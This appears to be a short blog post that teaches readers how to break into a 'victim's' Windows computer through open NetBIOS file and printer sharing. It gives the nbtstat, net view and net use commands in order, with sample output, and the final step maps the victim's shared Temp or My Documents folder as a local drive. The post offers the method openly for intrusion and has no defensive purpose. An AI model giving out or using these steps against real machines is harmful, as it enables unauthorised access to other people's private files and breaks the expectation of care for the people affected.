If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.
This is how : -
Click "Start -> Run -> cmd"
Type the following at the Dos Prompt
Code: Select All
Nbtstat -A
[e.g: nbtstat -A 207.175.1.1]
This will give you a read out that looks like this
Code: Select All
NetBIOS Remote Machine Name Table ____________________________________ Name Type Status ------------------------------------ abhi <00> UNIQUE Registered WORK <00> GROUP Registered abhi <03> UNIQUE Registered abhi <20> UNIQUE Registered WORK <1e> GROUP Registered WORK <1d> UNIQUE Registered __MSBROWSE__.<01>GROUP Registered ____________________________________
The numbers in the <> are hex code values. What we are
interested in is the “Hex Code- number of <20>.
A hex code of <20> means you have file and printer sharing turned on.
Next step is to find out what is being shared. This is how : -
Code: Select All
Net view \\
[e.g : net view \\207.175.1.1]
You will then get a response that looks something like this.
Code: Select All
Shared resources at \\ip_address Sharename Type Comment ______________________ MY DOCUMENTS Disk TEMP Disk ______________________ (The command was completed successfully.)
This shows you that your potential victim has their My
Documents Folder shared and their Temp directory shared. For
you to then get access to those folders next command will be.
Code: Select All
Net use x: \\
[e.g : net use x: \\207.175.1.1\temp]
If all goes well for you, you will then get a response of
Code: Select All
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there.
No comments:
Post a Comment